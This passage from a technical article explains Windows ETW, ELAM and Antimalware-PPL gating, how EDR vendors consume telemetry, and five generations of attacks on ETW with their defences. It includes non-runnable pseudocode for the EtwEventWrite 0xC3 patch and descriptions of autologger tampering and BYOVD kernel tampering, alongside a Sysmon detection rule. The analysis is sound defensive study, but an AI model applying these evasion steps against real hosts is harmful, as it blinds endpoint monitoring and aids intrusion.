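  if (inv.goodDriverSigners.indexOf(driverSigner) >= 0) return "KnownGood";
  return "Unknown";
}

// Kernel-side decision. The caller chooses whether unknown drivers initialize;
// known-bad drivers never do in this sketch.
function shouldInitialize(v: Verdict, initializeUnknown: boolean): boolean {
  return v === "KnownGood" || (v === "Unknown" && initializeUnknown);
}

const ANTIMALWARE_EKU = "1.3.6.1.4.1.311.61.4.1";

interface ServiceImage { signerThumbprint: string; ekus: string[]; }

// Admission to Antimalware-PPL when the SCM launches the service protected:
// the image needs the Antimalware EKU and a signer the ELAM driver vouches for.
function admitToAntimalwarePpl(inv: ElamInventory, img: ServiceImage): boolean {
  return img.ekus.indexOf(ANTIMALWARE_EKU) >= 0 &&
    inv.serviceSigners.indexOf(img.signerThumbprint) >= 0;
}
```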

Early Launch Antimalware (ELAM): A driver class that loads before any non-Microsoft boot driver. The ELAM driver registers a boot-driver callback to inspect subsequent drivers and carries an embedded-resource certificate inventory of permitted user-mode antimalware service signatures. Together with PPL, ELAM gates which user-mode antimalware services can pass the Antimalware-PPL admission check.

The 1709 onboarding

Microsoft Defender's MsMpEng.exe ran at the Antimalware signer level by default starting around the Windows 10 1709 timeframe (October 17, 2017), and the same release is widely cited in EDR-vendor documentation as the moment the Antimalware-PPL onboarding was extended to third-party EDR vendors. The Microsoft primary that pins the 1709 third-party onboarding date is not in the public ETW documentation; we treat the date as widely-cited rather than verified.

The dispositive practical evidence is the Trail of Bits 2023 walkthrough by Yarden Shafir [@trailofbits-shafir]. Shafir's WinDbg JS scripts walk the live _ETW_REALTIME_CONSUMER data structures of a running Windows host and print:

"Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3" -- [@trailofbits-shafir]

That is CrowdStrike's user-mode service, holding a real-time consumer handle to an EtwTi logger session. By 2023 the third-party Antimalware-PPL story is operationally complete.

The admission sequence, step by step (Winload, ELAM driver, Service Control Manager, EDR service, kernel ETW):
Winload loads the ELAM driver during early boot.
The ELAM driver registers IoRegisterBootDriverCallback, then reads its embedded certificate inventory; from this point it gates subsequent boot drivers.
The SCM starts the EDR service with the PROTECTED_ANTIMALWARE_LIGHT flag.
The kernel verifies the service's signature against the ELAM allow-list and admits it to Antimalware-PPL.
The EDR service calls EnableTraceEx2(session, EtwTi GUID, ...).
Kernel ETW checks that the caller's signer level is at least Antimalware and returns SUCCESS. A non-PPL caller would receive ERROR_ACCESS_DENIED at this step.

Why this gate matters for the section 1 hook

The asymmetry that defines the entire generation is one sentence in the fluxsec.red walkthrough [@fluxsec-eti]:

"We cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself. To do so, you'd require kernelmode execution and then to patch out those signals so no ETW signals are emitted." -- [@fluxsec-eti]

That is the answer to the puzzle the section 1 hook posed. The Adam Chester 2020 patch operates on a user-mode trampoline in the calling process. ntdll!EtwEventWrite is a stub that calls down through NtTraceEvent into the kernel; rewriting its first byte to 0xC3 short-circuits the user-mode entry path and the calling process emits no events through that stub. But EtwTi does not fire from the user-mode entry path. EtwTi fires from inside the kernel implementation of NtAllocateVirtualMemory and friends, after the syscall has crossed the boundary, on a path the user-mode patcher cannot reach without first achieving kernel execution.

Key idea: EtwTi is the only ETW provider in the catalogue whose producer fires from the kernel side of the syscall path -- and that is exactly why a user-mode patch in the calling process cannot silence it. The PPL+ELAM gate that controls consumer admission is paired with a producer location that no in-process attacker can reach.

The 2017 PPL+ELAM gate was a deliberate structural defense against the patch class that was only fully publicised three years later. By the time Chester wrote his March 2020 post, the load-bearing security signal was already structurally out of reach of his technique.

The combination of PPL and ELAM is not an arbitrary defense-in-depth stack. PPL gates *consumer identity* at signer level: only a binary signed with the Antimalware EKU and enrolled in an ELAM allow-list can subscribe. ELAM gates *load order*: the gate is set during early boot, before any code an attacker could load gets a chance to interfere. The signer-level check is hard because forging the signature requires breaking Microsoft's PKI; the load-order check is hard because subverting it requires compromising the boot path, which Secure Boot and the Vulnerable Driver Blocklist exist to defend.

That is the gate. Now we walk the consumers that pass through it.

10. Six vendors, three spectra: a map of the EDR consumer architecture

Defender, CrowdStrike, SentinelOne, Sysmon, Wazuh, Elastic Defend. They look interchangeable on a vendor comparison sheet. They are not, and the differences are entirely about which substrates each one consumes.

There are three axes that distinguish them.

Axis 1: kernel callbacks vs ETW

Some EDRs consume process-creation events through ETW (subscribing to Microsoft-Windows-Kernel-Process from a SYSTEM-privileged user-mode service). Others register kernel callbacks directly through PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] and PsSetCreateThreadNotifyRoutine [@ms-pssetthreadnotify] from a kernel driver they ship.

The trade-off is sharp. Kernel callbacks are synchronous: the kernel calls into the driver before the operation completes, the driver runs at PASSIVE_LEVEL in the originating thread context with normal kernel APCs disabled, and a process-creation callback registered through the Ex variant can deny the operation by writing a non-success status to CreationStatus. ETW is asynchronous: the event is emitted from the producer's hot path, drained from a per-CPU buffer by the writer thread, and delivered to the consumer's callback at some later point. ETW cannot deny anything; it can only observe.
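The difference is visible in a small simulation. Everything here is a toy: the `ToyKernel` class and its methods are hypothetical, and only the `CreationStatus` idea and the `STATUS_ACCESS_DENIED` value (0xC0000022) come from the real API. The synchronous callback gets to veto before the process exists; the buffered ETW-style event is read only after the fact.

```typescript
// Toy contrast between a synchronous create-process callback, which can veto,
// and an ETW-style buffer, which a consumer only reads after the fact.
const STATUS_SUCCESS = 0;
const STATUS_ACCESS_DENIED = 0xc0000022;

interface CreateInfo {
  imageName: string;
  creationStatus: number; // a callback may overwrite this to deny creation
}

type CreateCallback = (info: CreateInfo) => void;

class ToyKernel {
  private callbacks: CreateCallback[] = [];
  private etwBuffer: string[] = [];

  registerCallback(cb: CreateCallback): void {
    this.callbacks.push(cb);
  }

  createProcess(imageName: string): boolean {
    const info: CreateInfo = { imageName: imageName, creationStatus: STATUS_SUCCESS };
    // Synchronous path: every callback runs before creation completes.
    for (const cb of this.callbacks) cb(info);
    if (info.creationStatus !== STATUS_SUCCESS) return false; // vetoed
    // Asynchronous path: the event is only buffered; nobody can veto it now.
    this.etwBuffer.push(`ProcessStart ${imageName}`);
    return true;
  }

  // A consumer drains the buffer later, after the process is already running.
  drainEtw(): string[] {
    const events = this.etwBuffer;
    this.etwBuffer = [];
    return events;
  }
}
```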

Kernel notify callbacks: The `PsSetCreate*NotifyRoutine` family of kernel APIs. A driver calls `PsSetCreateProcessNotifyRoutineEx` (process create/exit), `PsSetCreateThreadNotifyRoutine` (thread create/exit), or `PsSetLoadImageNotifyRoutine` (image load) at boot to register a callback. The kernel invokes the callback synchronously, in the originating thread context at PASSIVE_LEVEL with normal kernel APCs disabled. The `Ex` variant of the process callback receives a `CreationStatus` field the driver can write to deny the operation.

CrowdStrike, SentinelOne, Sysmon, and Elastic Defend ship kernel drivers and use callbacks for the latency-critical hot path. Defender uses both -- callbacks from WdFilter.sys and ETW consumption from MsMpEng.exe -- because as the in-box engine it has the institutional position to do so. Wazuh ships no kernel driver; it consumes ETW exclusively via SilkETW-class wrappers, which makes it less invasive but unable to deny.

Axis 2: PPL adoption

Defender (MsMpEng.exe and MsMpEngCP.exe) runs at Antimalware-PPL by default. CrowdStrike's CSFalconService.exe runs at Antimalware-PPL, demonstrably [@trailofbits-shafir]. SentinelOne's SentinelAgent.exe is widely reported to run at Antimalware-PPL via vendor documentation, although it does not appear in the Trail of Bits sample debugger output. Sysmon runs as a protected process but not at the Antimalware signer level [@ms-sysmon] -- the Microsoft Learn page states "The service runs as a protected process, thus disallowing a wide range of user mode interactions" without naming Antimalware specifically.

Wazuh and Elastic Defend's user-mode services run as standard SYSTEM-privileged services without PPL.

Axis 3: EtwTi consumption

This axis is determined by axis 2. Defender consumes EtwTi by design -- it is the in-box reason EtwTi exists. CrowdStrike and SentinelOne consume EtwTi (the Trail of Bits debugger output is the practical demonstration). Sysmon does not consume EtwTi: it is not Antimalware-PPL, so its EnableTraceEx2 calls against the EtwTi GUID would receive ERROR_ACCESS_DENIED. Sysmon relies on its own SysmonDrv.sys callbacks for the in-memory threat surface that EtwTi covers for the others. Wazuh and Elastic Defend do not consume EtwTi for the same reason; Elastic Defend ships its own kernel driver to compensate [@elastic-doubling-down], using Microsoft-blessed kernel-callback paths for memory events.

Vendor	Process surface	PPL level	EtwTi?	Primary source
Microsoft Defender	Driver callbacks (`WdFilter.sys`) + ETW (`MsMpEng.exe`)	Antimalware-PPL	Yes	[@ms-protect-am]
CrowdStrike Falcon	Driver callbacks + ETW	Antimalware-PPL	Yes ([@trailofbits-shafir] live evidence)	[@trailofbits-shafir]
SentinelOne	Driver callbacks + ETW	Antimalware-PPL	Widely reported	-- (vendor docs; SentinelAgent.exe not in [@trailofbits-shafir] sample)
Sysmon	`SysmonDrv.sys` callbacks; publishes via own ETW provider	Protected (not Antimalware)	No	[@ms-sysmon]
Wazuh	ETW only (SilkETW-class)	Standard SYSTEM	No	--
Elastic Defend	Own kernel driver + ETW	Standard SYSTEM	No	[@elastic-doubling-down]

Sysmon is worth singling out as the canonical callback-then-publish reference architecture. Its kernel driver registers PsSetCreate*NotifyRoutine callbacks; its user-mode service consumes the events the driver delivers; and the service then publishes them via its own Microsoft-Windows-Sysmon ETW provider for any downstream consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) to read. The result is that Sysmon's events are universally consumable -- which is why Wazuh and Splunk both ship Sysmon configurations as their default kernel-event source.

Sysmon is not itself an Antimalware-PPL EDR, but its design is still the reference for the callback-then-publish pattern. By publishing through its own ETW provider rather than writing to a private channel, Sysmon makes its events consumable by any downstream pipeline: Wazuh and the Splunk Universal Forwarder can both ingest Sysmon events without any custom integration work. This is why Sysmon, despite being free, is the de facto kernel-event source for the open-source SIEM world.

The two consumption substrates, side by side:
Kernel callbacks (synchronous, can deny): Sysmon driver, CrowdStrike driver, SentinelOne driver, Elastic driver, Defender WdFilter.sys.
ETW providers (asynchronous, observe-only, up to 8 consumers per provider): Defender MsMpEng, CrowdStrike service, SentinelOne service, Sysmon service, Wazuh ETW reader, Elastic Defend service.
The two substrates sit at opposite ends of a latency-versus-coupling axis.

The CrowdStrike July 2024 channel-file outage was a kernel-driver brittleness story, not an ETW story. The Falcon sensor's Content Interpreter, running inside the kernel driver, processed a channel file whose Rapid Response Content template defined 21 input fields while the sensor code that invoked the interpreter supplied only 20; reading the nonexistent 21st value was an out-of-bounds read that BSOD-ed roughly 8.5 million Windows hosts [@ms-crowdstrike-2024] [@crowdstrike-rca-2024]. That story belongs to the App Identity in Windows article [@paragmali-com-app-ide] in this series; it is mentioned here only to mark that the cost of the synchronous-kernel-driver path is a higher blast radius when the driver itself is buggy.

A note on Defender's cloud schema. The events that surface in Microsoft Defender for Endpoint's hunting tables -- DeviceProcessEvents, DeviceFileEvents, DeviceNetworkEvents, DeviceImageLoadEvents, DeviceRegistryEvents -- are the cloud-side abstraction over the kernel and ETW telemetry the Defender sensor collects locally. The full schema mapping from ETW provider to cloud column is out of scope here, but the substrate is the same.

Six vendors, three axes, one substrate. Now we walk the attack tradition that the substrate has to survive.

11. The attack tradition: five generations of trying to blind ETW

Every generation of ETW has been attacked. Some attacks broke a single provider; some broke every user-mode provider on a host; one would, if it worked at scale, break Defender. The defense story is on the same five-generation timeline.

Gen 1 (2014-2018): autologger registry tampering

The dispositive taxonomy is Matt Graeber and Lee Christensen's December 24, 2018 Palantir CIRT post [@palantir-tampering-wayback], preserved in the Wayback Machine because the direct Medium URL has since returned HTTP 403 to non-browser fetchers. The opening framing is verbatim:

"Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process." -- [@palantir-tampering-wayback]

Graeber and Christensen split the technique into two classes. Persistent tampering writes to the autologger registry path described in section 6, disabling a session before it ever starts at next boot; the events of interest are never captured because the session is never running. Ephemeral tampering targets a live session: stopping the session via ControlTrace, removing a provider from a session via EnableTraceEx2(EVENT_CONTROL_CODE_DISABLE_PROVIDER, ...), or directly clearing the session's buffers.

The defense is direct: monitor the autologger registry surface. Sysmon Event ID 13 [@ms-sysmon] surfaces registry value-set events in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\; a SOC playbook that alerts on any unexpected write to that subtree catches the persistent class of attack reliably. Matt Graeber's authorship is cross-confirmed by the palantir/exploitguard repository [@gh-palantir-exploitguard], which credits him as the lead researcher on the ETW work.
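The playbook rule can be sketched as a filter over Sysmon Event ID 13 records. The flattened record shape is an assumption (its members mirror the Sysmon EID 13 fields `Image`, `TargetObject`, and `Details`), the allow-listed writer is a hypothetical placeholder to tune per estate, and ranking zeroed DWORD values as higher severity is an illustrative heuristic for the "disable at next boot" pattern, not a rule from the Palantir post.

```typescript
// Hypothetical flattened view of a Sysmon Event ID 13 (registry value set).
interface SysmonRegistrySet {
  eventId: number;
  image: string;        // process that wrote the value
  targetObject: string; // full registry path, including the value name
  details: string;      // new value, e.g. "DWORD (0x00000000)"
}

const AUTOLOGGER_PREFIX = "hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\";

// Hypothetical allow-list of writers the SOC expects; tune per estate.
const EXPECTED_WRITERS = ["c:\\windows\\system32\\svchost.exe"];

function isAutologgerTamperCandidate(e: SysmonRegistrySet): boolean {
  if (e.eventId !== 13) return false;
  if (e.targetObject.toLowerCase().indexOf(AUTOLOGGER_PREFIX) !== 0) return false;
  return EXPECTED_WRITERS.indexOf(e.image.toLowerCase()) < 0;
}

// Illustrative heuristic: a value zeroed under this subtree looks like a
// session or provider being switched off, so it ranks higher.
function severity(e: SysmonRegistrySet): "high" | "medium" | "none" {
  if (!isAutologgerTamperCandidate(e)) return "none";
  return /DWORD \(0x0+\)$/.test(e.details) ? "high" : "medium";
}
```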

Gen 2 (2020): user-mode `EtwEventWrite` 0xC3 RET patch

The technique that made ETW patching a household tradecraft term is Adam Chester's "Hiding your .NET - ETW", March 17, 2020 [@xpn-hiding-dotnet]. The mechanic is one byte:

Locate ntdll!EtwEventWrite (or in modern variants ntdll!NtTraceEvent) in the calling process's memory.
Use VirtualProtect to make the page writable.
Write the byte 0xC3 over the function's first byte.
Restore the page protection.

0xC3 is the near-return opcode [@felixcloutier-ret]: "C3 RET ZO Valid Valid Near return to calling procedure." Any caller into the function falls straight back to its return address before producing a single event. The calling process now silently fails to emit any user-mode ETW events for any provider that funnels through the patched stub -- including Microsoft-Windows-DotNETRuntime.

The technique has been re-implemented in every language that can call VirtualProtect. The fluxsec.red Rust port [@fluxsec-etw-patching] explains the modern variant verbatim:

"When a ETW Provider sends a notification, it will eventually reach into ntdll.dll for the function NtTraceEvent... we can simply patch the function address to return straight from byte 0. The opcode for a ret is C3, so we can swap out the opcode 4C with C3 to immediately return out of the stub." -- [@fluxsec-etw-patching]

Here is the structure of the patch in TypeScript pseudocode -- not actually runnable Win32, but mirroring exactly what a Windows binary would do:

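```typescript
// Pseudocode: silence user-mode ETW for the calling process.
// This silences only the calling process and only user-mode providers
// that funnel through the patched stub.

// Hypothetical bindings standing in for the Win32 calls of the same names.
// They are declared, not implemented: this type-checks but does not run.
declare function getModuleHandle(module: string): bigint;
declare function getProcAddress(module: bigint, name: string): bigint;
// Returns the previous protection (VirtualProtect's lpflOldProtect out-parameter).
declare function virtualProtect(addr: bigint, size: number, newProtect: number): number;
declare function writeByte(addr: bigint, value: number): void;

// 1. Resolve the address of ntdll!EtwEventWrite in this process.
const ntdll = getModuleHandle("ntdll.dll");
const fn = getProcAddress(ntdll, "EtwEventWrite");

// 2. Make the function's first page writable.
const PAGE_EXECUTE_READWRITE = 0x40;
const oldProtect = virtualProtect(fn, 1, PAGE_EXECUTE_READWRITE);

// 3. Write 0xC3 (RET) over the first byte. Callers now return immediately.
writeByte(fn, 0xc3);

// 4. Restore the original page protection.
virtualProtect(fn, 1, oldProtect);

// Limits:
// - Silences only this process.
// - Silences only providers whose emit path funnels through this stub.
// - Cannot silence kernel-emitted providers like Microsoft-Windows-Threat-Intelligence.
```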

Note: The patch operates on the calling process's user-mode trampoline. Other processes on the host are unaffected; their ETW emissions continue normally. Kernel-emitted providers like Microsoft-Windows-Threat-Intelligence are unaffected even in the patched process; they fire from the kernel side of the syscall path, after control has crossed the user/kernel boundary, on a code path the user-mode patcher cannot reach without first achieving kernel execution.
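The three limits in that note can be checked in a toy simulation. Nothing here touches real memory or real ETW; `SimProcess` and its methods are hypothetical, the shared `bus` array stands in for the host-wide event stream, and 0x4C is used as the unpatched first byte only because the fluxsec.red quote names it for `NtTraceEvent`.

```typescript
// Toy simulation: nothing here touches real memory or real ETW.
const RET = 0xc3;
const UNPATCHED_FIRST_BYTE = 0x4c; // first byte of ntdll!NtTraceEvent per the quote above

class SimProcess {
  // This process's own copy of the stub's first byte.
  private stubFirstByte = UNPATCHED_FIRST_BYTE;

  constructor(readonly pid: number, private readonly bus: string[]) {}

  // The 0xC3 patch, applied to this process only.
  patchStub(): void {
    this.stubFirstByte = RET;
  }

  // User-mode provider path: every event goes through the stub.
  emitUserMode(provider: string): void {
    if (this.stubFirstByte === RET) return; // returns before anything is written
    this.bus.push(`${provider} from ${this.pid}`);
  }

  // Memory-modifying syscall: the kernel emits the EtwTi event after the
  // user/kernel boundary, so the state of the user-mode stub is irrelevant.
  allocateRemote(targetPid: number): void {
    this.bus.push(`Threat-Intelligence ALLOCVM ${this.pid}->${targetPid}`);
  }
}
```

After patching process 100, its DotNETRuntime events vanish, process 200's still arrive, and process 100's cross-process allocation into 200 is still reported by the kernel-side provider.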

Gen 3 (2021-2023): kernel-mode primitives

If a user-mode patch cannot reach EtwTi, can a kernel-mode patch? Yes -- but the attacker first needs kernel execution. The most common path is BYOVD [@paragmali-com-in-windows]: load a signed but vulnerable driver and use its primitive to read or write kernel memory. Once you can write kernel memory you can target ETW's internal data structures directly.

Binarly's Black Hat Europe 2021 talk [@binarly-edr] documents the surface verbatim:

"Many ways to disable ETW logging are publicly available from passing a TRUE boolean parameter into a `nt!EtwpStopTrace` function to finding an ETW specific structure and dynamically modifying it or patching `ntdll!ETWEventWrite` or `advapi32!EventWrite` to return immediately thus stopping the user-mode loggers." -- [@binarly-edr]

The kernel-side primitives Binarly enumerates target the _ETW_GUID_ENTRY structure for a provider, the EtwpRegistration linked list of registered providers, and the EtwpEventTracingProhibited flag the kernel checks before emitting events. Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir] provides the contemporary kernel-side data structure walk through _ETW_REALTIME_CONSUMER and _ETW_SILODRIVERSTATE, and notes:

"Most recently, the Lazarus Group bypassed EDR detection by disabling ETW providers" -- [@trailofbits-shafir]

The architectural-level treatment is well-documented; the specific kernel offsets that change between Windows builds are a moving target. We treat the technique class as well-established and the per-build offset details as out of scope.

Defense Gen 1 (2017): Antimalware-PPL + ELAM gate on EtwTi

Section 9 covered this in detail. The point to record here, in the attack-tradition timeline, is that the Antimalware-PPL gate predates the Adam Chester 2020 user-mode patch by three years. Microsoft did not respond to Chester's post; they had already put the load-bearing security signal structurally out of reach of any user-mode patch in the calling process. The user-mode patch class works generically against Microsoft-Windows-DotNETRuntime and the rest of the user-mode catalogue; it is structurally impotent against Microsoft-Windows-Threat-Intelligence.

Defense Gen 2 (2022): Vulnerable Driver Blocklist on by default

The kernel-mode primitive class needs a kernel write. Without a vulnerability in the EDR's kernel driver, the realistic path is BYOVD: load a third-party signed driver that exposes a memory-write primitive. The structural defense is Microsoft's Vulnerable Driver Blocklist [@ms-vdb]:

Since the Windows 11 2022 update, the vulnerable driver blocklist is enabled by default for all devices, and can be turned on or off via the Windows Security app... the vulnerable driver blocklist is also enforced when either memory integrity, also known as hypervisor-protected code integrity (HVCI), Smart App Control, or S mode is active... The blocklist is updated quarterly. In addition, blocklist updates are delivered through the monthly Windows updates as part of the standard servicing process. -- [@ms-vdb]

The blocklist enumerates known-vulnerable signed drivers by hash; the kernel refuses to load anything on the list. On a Windows 11 22H2-or-later host with the default settings, the BYOVD primitive against most known-vulnerable drivers is closed. With HVCI on, the closure is enforced even against attackers who would otherwise try to load drivers via legacy paths. The empirical bound is the LOLDrivers project's catalogue of known-vulnerable drivers; the blocklist tracks public discovery with a lag of up to roughly one quarter, and that lag is the residual window an attacker can exploit before a freshly disclosed driver is added.
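A minimal sketch of the lookup described above, modelled in user-space JavaScript rather than in the kernel's code-integrity path. It assumes, as the paragraph does, that the list is keyed purely by SHA-256 image hash; `sha256Hex`, `makeBlocklist`, `isLoadAllowed`, and the byte buffers standing in for driver images are all hypothetical.

```javascript
// Toy model of a hash-keyed driver deny list (not the real code-integrity implementation).
const crypto = require("crypto");

// SHA-256 of a driver image, as lowercase hex.
function sha256Hex(imageBytes) {
  return crypto.createHash("sha256").update(imageBytes).digest("hex");
}

// Hypothetical blocklist built from images already known to be vulnerable.
function makeBlocklist(knownVulnerableImages) {
  return new Set(knownVulnerableImages.map((image) => sha256Hex(image)));
}

// A load is refused exactly when the image hash appears on the list.
function isLoadAllowed(blocklist, imageBytes) {
  return !blocklist.has(sha256Hex(imageBytes));
}

// Stand-in byte buffers instead of real .sys files.
const knownVulnerable = Buffer.from("known-vulnerable-driver-v1");
const freshlyDisclosed = Buffer.from("freshly-disclosed-driver-v7");
const blocklist = makeBlocklist([knownVulnerable]);

console.log(isLoadAllowed(blocklist, knownVulnerable)); // false: hash is listed
console.log(isLoadAllowed(blocklist, freshlyDisclosed)); // true: not listed yet
```

The second call is the disclosure-to-update window in miniature: nothing changes for the freshly disclosed driver until its hash lands on the list.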

BYOVD (Bring Your Own Vulnerable Driver): the attack pattern of loading a known-vulnerable but signed driver to obtain a kernel-mode primitive (memory read, memory write, or arbitrary code execution). Used in real-world EDR-blinding attacks, including by the Lazarus Group as cited in Trail of Bits' 2023 ETW walk [@trailofbits-shafir].

Vulnerable Driver Blocklist: the Microsoft-maintained blocklist of known-vulnerable signed drivers, by hash. Enabled by default on Windows 11 22H2 and later. Enforced more strictly when HVCI, Smart App Control, or S mode is active. Updated quarterly per the Microsoft Learn primary [@ms-vdb].

The LOLDrivers project [@loldrivers] is the empirical anchor for the BYOVD lag story. It catalogues known-vulnerable signed drivers as a community resource. The Microsoft blocklist updates quarterly, but blocklist updates are also delivered through monthly Windows servicing, so a freshly disclosed driver can live in an exploitation window as short as ~1 month (via Patch Tuesday) or as long as a full quarter before its hash is added.

Attack generations against ETW, and the structural defense that answered each:
Gen 1 (2014-2018): Autologger registry tampering (Palantir CIRT taxonomy), answered by Sysmon Event ID 13 monitoring of the Autologger subtree.
Gen 2 (2020): the EtwEventWrite 0xC3 RET patch (Adam Chester), answered by the Antimalware-PPL plus ELAM gate on EtwTi (2017).
Gen 3 (2021-2023): kernel tampering with _ETW_GUID_ENTRY, EtwpRegistration, and EtwpStopTrace via BYOVD, answered by the Vulnerable Driver Blocklist (default-on in Windows 11 22H2, plus HVCI).

The 2026 picture

User-mode patching cannot reach the kernel-mode provider that EDR cares about. The BYOVD primitive that could reach it is structurally narrowed by default on supported hardware. The remaining gap is the long tail of newly-disclosed vulnerable drivers between disclosure and blocklist update, plus any custom kernel zero-day an attacker discovers in an EDR's own driver. Both are real, both are exploited in the wild, neither is the universally-applicable evasion the 2020-era user-mode patch class was.

That is the operational story. But ETW has structural limits even when no attacker is patching anything.

12. Theoretical limits: what ETW cannot see, even with every defence engaged

Even on a perfectly-configured Windows 11 box -- HVCI [@paragmali-com-in-windows] on, Vulnerable Driver Blocklist on, Antimalware-PPL Defender consuming EtwTi, third-party EDR ELAM-onboarded -- there are events ETW does not emit. Some are observed too late. Some are not observed at all.

There are three structural ceilings.

Pre-ETW kernel paths

The Global Logger session is one of the earliest things to come up at boot, but it is not the first. Some early-init driver paths run before any ETW session exists; they cannot be traced via ETW. Measured Boot is the discipline that records this prefix into TPM PCRs, with attestation handled by the platform integrity layer rather than by ETW. The implication for EDR is that any malicious code executing during early boot, before the Global Logger session is up, is invisible to ETW.

Incomplete EtwTi syscall coverage

The 10 KERNEL_THREATINT_TASK_* task IDs are the public surface; the underlying syscall set the kernel actually instruments is not exhaustively documented. The fluxsec.red inventory [@fluxsec-eti] catalogues that public surface, not the private one. Some syscalls are clearly covered (NtAllocateVirtualMemory for cross-process allocation surfaces as KERNEL_THREATINT_TASK_ALLOCVM); some have partial coverage (MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords cover some but not all of the section-mapping primitive set across NtCreateSection, NtMapViewOfSection, NtMapViewOfSectionEx, image-section vs file-section variants); some are not enumerated at all in the public manifest. Process-hollowing primitives that combine NtUnmapViewOfSection and NtMapViewOfSection may be partially covered depending on which path the attacker takes.

The async-flush gap

ETW's per-CPU buffering is asynchronous. If a process allocates RWX memory, writes shellcode, executes it, and returns within one writer-thread flush interval, the event is recorded, but it reaches the consumer only after the attacker's payload has already executed. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. The Microsoft Learn primary on About Event Tracing [@ms-about-etw] is explicit that events can be lost:

"Events can be lost if any of the following conditions occur ... The total event size is greater than 64K ... The disk is too slow to keep up with the rate at which events are being generated. ... For real-time logging, the real-time consumer is not consuming events fast enough." -- [@ms-about-etw]

No ETW-only EDR can prevent a syscall whose payload completes inside one writer flush. EDRs that ship a kernel driver and register synchronous callbacks (CrowdStrike, SentinelOne, Sysmon, Elastic Defend) can deny operations through the PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] CreationStatus field; ETW-only EDRs cannot. ETW is observation, not enforcement.
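A toy timeline makes the ordering problem concrete. This is not how ETW is implemented internally: the `BufferedTrace` class, the explicit `flush()` call, and the step names are hypothetical, and `runWithSyncCallback` only loosely mirrors a notify routine setting CreationStatus. The point is sequencing: the buffered consumer learns about the payload after it has run, while the inline callback gets a vote before the operation proceeds.

```javascript
// Toy model: events are buffered and reach the consumer only on flush.
class BufferedTrace {
  constructor() {
    this.pending = []; // recorded but not yet delivered
    this.delivered = []; // what the consumer has actually seen
  }
  emit(event) {
    this.pending.push(event);
  }
  flush() {
    this.delivered.push(...this.pending);
    this.pending = [];
  }
}

// Inline check, loosely analogous to a process-notify routine that can
// fail the operation; reports whether the operation went ahead.
function runWithSyncCallback(operation, callback) {
  return { executed: callback(operation) !== "deny" };
}

const trace = new BufferedTrace();
const timeline = [];

// The whole payload sequence completes between two flushes.
for (const step of ["AllocateRWX", "WriteShellcode", "ExecuteShellcode"]) {
  trace.emit({ step });
  timeline.push(`executed ${step}; consumer has seen ${trace.delivered.length} events`);
}
trace.flush();
timeline.push(`flushed; consumer has seen ${trace.delivered.length} events`);

// The synchronous path can refuse before anything runs.
const verdict = runWithSyncCallback({ step: "CreateProcess" }, () => "deny");

timeline.forEach((line) => console.log(line));
console.log(verdict.executed); // false
```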

Key idea: ETW is observation, not enforcement. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. Sub-microsecond payloads execute before the writer thread flushes; the layered defense stack of 2026 is an empirical bar, not a theoretical guarantee.

HVCI (hypervisor-protected code integrity): the VBS-backed code-integrity enforcement for kernel-mode code on Windows. With HVCI enabled, the hypervisor enforces that only signed kernel pages can execute. HVCI closes the attack class that loads unsigned drivers; combined with the Vulnerable Driver Blocklist, it closes most of the realistic BYOVD primitive surface as well.

The "events can be lost" enumeration in [@ms-about-etw] is the dispositive Microsoft acknowledgement of ETW's lossy substrate. SOC playbooks should treat ETW telemetry as best-effort, not as a guaranteed audit trail. Forensic claims that depend on completeness need an independent corroborating source.

Note: A detection-only EDR can alert on a malicious operation, but only after the operation has happened. By the time the SOC sees the alert, the syscall has completed, the shellcode has executed, the credentials have been stolen. This is why the kernel-callback path (with its ability to deny via CreationStatus) coexists with ETW even though ETW is more flexible: a SOC playbook needs both the speed of denial and the breadth of observation.

The 2026 layered stack -- Antimalware-PPL + EtwTi + HVCI + VBL -- raises the empirical bar enormously. It does not close the architectural gap. Sub-microsecond payloads still execute before the writer thread flushes. The BYOVD primitive on a non-HVCI box still defeats the kernel-callback layer. There are still problems the substrate cannot solve in principle.

Those are the limits we can describe. The next section is about the limits we cannot yet measure.

13. Open problems: keyword drift, secure kernel ETW, and the BYOVD arms race

The 2026 state of the art has five active open problems. Each has a partial workaround; none has a complete solution.

1. EtwTi keyword inventory drift across builds

Microsoft has not published a complete, current Microsoft-Windows-Threat-Intelligence keyword inventory. The community-maintained references -- the jdu2600 cross-build inventory [@gh-jdu2600] and the repnz manifest archive [@gh-repnz] -- provide only partial coverage and lag Microsoft's quarterly servicing cadence. EDR vendors that hard-code keyword bitmasks against an old build can silently miss events on newer builds because the keyword definitions have shifted underneath them. Detection engineers writing rules against KERNEL_THREATINT_TASK_* IDs that move between builds can get false negatives.
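One mitigation for this drift is to resolve keywords by name against the manifest of the build actually running, instead of shipping a precomputed mask. The sketch assumes the manifest has already been parsed into a name-to-mask map (for example from wevtutil output). The keyword names echo the ALLOCVM/MAPVIEW style, but every bit value below is invented for illustration, and `resolveKeywordMask` is a hypothetical helper.

```javascript
// ETW keywords are 64-bit masks, so BigInt avoids precision loss.
// Resolve names against the running build's manifest and report any that vanished.
function resolveKeywordMask(manifest, wantedNames) {
  let mask = 0n;
  const missing = [];
  for (const name of wantedNames) {
    if (Object.prototype.hasOwnProperty.call(manifest, name)) {
      mask |= manifest[name];
    } else {
      missing.push(name); // surface drift instead of silently losing coverage
    }
  }
  return { mask, missing };
}

// Invented per-build manifests: MAPVIEW_REMOTE moves to a different bit.
const buildA = { ALLOCVM_REMOTE: 0x4n, MAPVIEW_REMOTE: 0x100n };
const buildB = { ALLOCVM_REMOTE: 0x4n, MAPVIEW_LOCAL: 0x200n, MAPVIEW_REMOTE: 0x400n };
const wanted = ["ALLOCVM_REMOTE", "MAPVIEW_REMOTE"];

const hardCoded = 0x104n; // computed once against build A and never revisited
const onB = resolveKeywordMask(buildB, wanted);
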